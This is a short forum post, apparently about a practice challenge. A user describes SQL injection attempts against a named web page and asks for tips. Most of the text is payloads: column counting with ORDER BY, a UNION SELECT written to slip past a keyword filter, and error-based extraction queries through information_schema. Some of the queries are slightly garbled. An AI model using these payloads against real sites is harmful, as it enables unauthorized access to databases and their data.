Hi all,
I am confused with this bug, here is my test
http://www.arjun.altervista.org/level2.php?cid2=1' order by 3 %23
Unknown column '3' in 'order clause'
If order by 2, It is ok, so there are 2 columns selected in SQL select query
Now, continue with this query
http://www.arjun.altervista.org/level2.php?cid2=1' and 1 UNunionION select 1 %23
The used SELECT statements have a different number of columns
But when select 1,2: It don't show any error.
I tried with error based type with:
or 1 group by concatws(0x3a,version(),floor(rand(0)2)) having min(0) or 1 %23
and(select 1 FROM(select count(),concat((select (select concat(database())) FROM informationschema.tables LIMIT 0,1),floor(rand(0)2))x FROM informationschema.tables GROUP BY x)a)
And with many tests, but I can not get any useful information :(
Could you give me a tip
Thanks in advanced.
Be the First to Respond
Share Your Thoughts